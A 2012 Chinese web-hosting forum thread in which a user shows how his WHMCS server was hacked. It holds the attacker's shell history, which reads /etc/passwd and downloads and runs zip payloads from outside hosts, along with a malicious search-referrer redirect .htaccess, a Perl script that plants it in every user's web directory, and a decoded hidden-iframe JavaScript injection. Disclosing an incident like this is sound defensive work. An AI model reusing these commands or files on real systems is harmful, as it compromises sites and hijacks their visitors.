全球主机交流论坛

标题: 中招了,whmcs被黑 [打印本页]

---

作者: 老T    时间: 2012-1-8 20:49
标题: 中招了,whmcs被黑

1.   124  id
   
2.   125  ls /etc/valiases
   
3.   126  chomd 777 valiases
   
4.   127  pwd
   
5.   128  cd /home2/multi/public_html/
   
6.   129  cd..
   
7.   130  cat /etc/passwd
   
8.   131  root:x:0:0:root:/root:/bin/bash
   
9.   132  bin:x:1:1:bin:/bin:/sbin/nologin
   
10.   133  daemon:x:2:2:daemon:/sbin:/sbin/nologin
    
11.   134  adm:x:3:4:adm:/var/adm:/sbin/nologin
    
12.   135  lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    
13.   136  sync:x:5:0:sync:/sbin:/bin/sync
    
14.   137  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    
15.   138  halt:x:7:0:halt:/sbin:/sbin/halt
    
16.   139  mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    
17.   140  uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    
18.   141  operator:x:11:0:operator:/root:/sbin/nologin
    
19.   142  games:x:12:100:games:/usr/games:/sbin/nologin
    
20.   143  gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    
21.   144  ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    
22.   145  nobody:x:99:99:Nobody:/:/sbin/nologin
    
23.   146  vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    
24.   147  sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    
25.   148  ntp:x:38:38::/etc/ntp:/sbin/nologin
    
26.   149  mysql:x:500:500::/home/mysql:/sbin/nologin
    
27.   150  www:x:501:501::/home/www:/sbin/nologin
    
28.   151  saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
    
29.   152  mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    
30.   153  smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    
31.   154  root:x:0:0:root:/root:/bin/bash
    
32.   155  bin:x:1:1:bin:/bin:/sbin/nologin
    
33.   156  daemon:x:2:2:daemon:/sbin:/sbin/nologin
    
34.   157  adm:x:3:4:adm:/var/adm:/sbin/nologin
    
35.   158  lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    
36.   159  sync:x:5:0:sync:/sbin:/bin/sync
    
37.   160  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    
38.   161  halt:x:7:0:halt:/sbin:/sbin/halt
    
39.   162  mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    
40.   163  uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    
41.   164  operator:x:11:0:operator:/root:/sbin/nologin
    
42.   165  games:x:12:100:games:/usr/games:/sbin/nologin
    
43.   166  gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    
44.   167  ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    
45.   168  nobody:x:99:99:Nobody:/:/sbin/nologin
    
46.   169  vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    
47.   170  sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    
48.   171  ntp:x:38:38::/etc/ntp:/sbin/nologin
    
49.   172  mysql:x:500:500::/home/mysql:/sbin/nologin
    
50.   173  www:x:501:501::/home/www:/sbin/nologin
    
51.   174  saslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
    
52.   175  mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    
53.   176  smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    
54.   177  wget http://www.undp.org.sz/images/M_images/0.zip
    
55.   178  unzip 0.zip
    
56.   179  wget http://www.floraria-ariana.ro//tmp/htaccess.zip
    
57.   180  wget http://www.floraria-ariana.ro//htaccess.zip
    
58.   181  unzip htaccess.zip
    
59.   182  perl 0.pl
    
60.   183  pwd
    
61.   184  cd /home/
    
62.   185  ls
    
63.   186  cd www
    
64.   187  ls
    
65.   188  cd ..
    
66.   189  cd wwwroot
    
67.   190  ls
    
68.   191  cd xxx.xxx.xx
    
69.   192  wget http://www.smiv.com.ve/logs/pic.zip
    
70.   193  unzip pic.zip
    

复制代码

1. RewriteEngine On
   
2. RewriteCond %{HTTP_REFERER} .*google.* [OR]
   
3. RewriteCond %{HTTP_REFERER} .*ask.* [OR]
   
4. RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
   
5. RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
   
6. RewriteCond %{HTTP_REFERER} .*有图比.* [OR]
   
7. RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
   
8. RewriteCond %{HTTP_REFERER} .*qq.* [OR]
   
9. RewriteCond %{HTTP_REFERER} .*excite.* [OR]
   
10. RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    
11. RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    
12. RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    
13. RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    
14. RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    
15. RewriteCond %{HTTP_REFERER} .*goto.* [OR]
    
16. RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
    
17. RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
    
18. RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
    
19. RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    
20. RewriteCond %{HTTP_REFERER} .*search.* [OR]
    
21. RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
    
22. RewriteCond %{HTTP_REFERER} .*bing.* [OR]
    
23. RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
    
24. RewriteCond %{HTTP_REFERER} .*FB.* [OR]
    
25. RewriteCond %{HTTP_REFERER} .*推特.* [OR]
    
26. RewriteCond %{HTTP_REFERER} .*blog.* [OR]
    
27. RewriteCond %{HTTP_REFERER} .*live.* [OR]
    
28. RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
    
29. RewriteCond %{HTTP_REFERER} .*mail.* [OR]
    
30. RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
    
31. RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
    
32. RewriteCond %{HTTP_REFERER} .*ya.* [OR]
    
33. RewriteCond %{HTTP_REFERER} .*aport.* [OR]
    
34. RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
    
35. RewriteCond %{HTTP_REFERER} .*flickr.*
    
36. RewriteRule ^(.*)$ http://ulitka.kh.ua/vb/showthread.php [R=permanent,L]

复制代码

1. #!/usr/bin/perl
   
2. # Exploit tool v1.0 Coded L3y Black Dream(Modify By s3f4)
   
3. # Valid Exploits For Linux Servers ...
   
4. # [ LocalKernel.Com ]
   
5. # Let's Start ...
   
6. {
   
7. system("cp .htaccess  /home/daemon/public_html/.htaccess");
   
8. system("cp .htaccess  /home/adm/public_html/.htaccess");
   
9. system("cp .htaccess  /home/lp/public_html/.htaccess");
   
10. system("cp .htaccess  /home/sync/public_html/.htaccess");
    
11. system("cp .htaccess  /home/shutdown/public_html/.htaccess");
    
12. system("cp .htaccess  /home/halt/public_html/.htaccess");
    
13. system("cp .htaccess  /home/mail/public_html/.htaccess");
    
14. system("cp .htaccess  /home/uucp/public_html/.htaccess");
    
15. system("cp .htaccess  /home/operator/public_html/.htaccess");
    
16. system("cp .htaccess  /home/games/public_html/.htaccess");
    
17. system("cp .htaccess  /home/gopher/public_html/.htaccess");
    
18. system("cp .htaccess  /home/ftp/public_html/.htaccess");
    
19. system("cp .htaccess  /home/nobody/public_html/.htaccess");
    
20. system("cp .htaccess  /home/vcsa/public_html/.htaccess");
    
21. system("cp .htaccess  /home/sshd/public_html/.htaccess");
    
22. system("cp .htaccess  /home/ntp/public_html/.htaccess");
    
23. system("cp .htaccess  /home/mysql/public_html/.htaccess");
    
24. system("cp .htaccess  /home/www/public_html/.htaccess");
    
25. system("cp .htaccess  /home/saslauth/public_html/.htaccess");
    
26. system("cp .htaccess  /home/mailnull/public_html/.htaccess");
    
27. system("cp .htaccess  /home/smmsp/public_html/.htaccess");
    
28. print "[ sefa [AT] google [DOT] tk ^ LocalKernel.Com]";
    
29. }

复制代码

---

作者: 汉陈帝国    时间: 2012-1-8 20:49
恭喜

---

作者: 我是马甲撒    时间: 2012-1-8 20:49
同情，悲催

---

作者: whhuazi    时间: 2012-1-8 20:49
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: lazyzhu    时间: 2012-1-8 20:50
楼主，赶紧~

---

作者: oldghost    时间: 2012-1-8 20:50
同情

---

作者: master    时间: 2012-1-8 20:50
杯具

---

作者: Kvm    时间: 2012-1-8 20:50

---

作者: bearqq    时间: 2012-1-8 20:59
wget http://www.smiv.com.ve/logs/pic.zip
我是不是知道得太多了

---

作者: ebizhost    时间: 2012-1-8 21:00

bearqq 发表于 2012-1-8 13:59
wget http://www.smiv.com.ve/logs/pic.zip
我是不是知道得太多了

绝对是

---

作者: chaoren521    时间: 2012-1-8 21:03
看不懂

---

作者: 白日梦    时间: 2012-1-8 21:07
恭喜！！

---

作者: xiaoyaohou    时间: 2012-1-8 21:08

---

作者: onesz    时间: 2012-1-8 21:08
哦也

---

作者: ljldcx    时间: 2012-1-8 21:08
不错，呵呵！支持了

---

作者: bearqq    时间: 2012-1-8 21:24
RewriteRule ^(.*)$ http://ulitka.kh.ua/vb/showthread.php [R=permanent,L]

解密

<!--
document.write(unescape('<script type="text/javascript">document.write('<iframe src="http://adfoc.us/143382230907" style=" dIsPlAy : NoNe; "></iframe>
<META HTTP-EQUIV="Refresh" CONTENT=";URL=http://adfoc.us/143382198543">
<br>')</script>'));
//-->

---

作者: 咖啡    时间: 2012-1-8 21:27

---

作者: gamecreating    时间: 2012-1-8 21:29
提示: 作者被禁止或删除 内容自动屏蔽

---

作者: johnny    时间: 2012-1-8 21:46
杯具啊···

---

作者: dotww    时间: 2012-1-8 21:46
这个黑客是新手.

---

作者: 老T    时间: 2012-1-8 21:49
杯具!

---

作者: 老T    时间: 2012-1-8 21:52

bearqq 发表于 2012-1-8 21:24
RewriteRule ^(.*)$ http://ulitka.kh.ua/vb/showthread.php [R=permanent,L]

解密

原来是短地址赚钱的!

---

作者: 不可撤销    时间: 2012-1-8 21:53

---

作者: theiter    时间: 2012-1-8 21:58

---

作者: 郎中中    时间: 2012-1-8 22:03

---

作者: xspoco    时间: 2012-1-8 22:28
看不懂

---

作者: 小懒猪    时间: 2012-1-8 22:30
楼主中奖了

---

作者: mikj521    时间: 2012-1-8 23:39

---

作者: hackfengl    时间: 2012-1-9 13:01

bearqq 发表于 2012-1-8 20:59
wget http://www.smiv.com.ve/logs/pic.zip
我是不是知道得太多了

---

作者: laoma348    时间: 2012-1-9 13:26
webshell

---

欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/)

Powered by Discuz! X3.4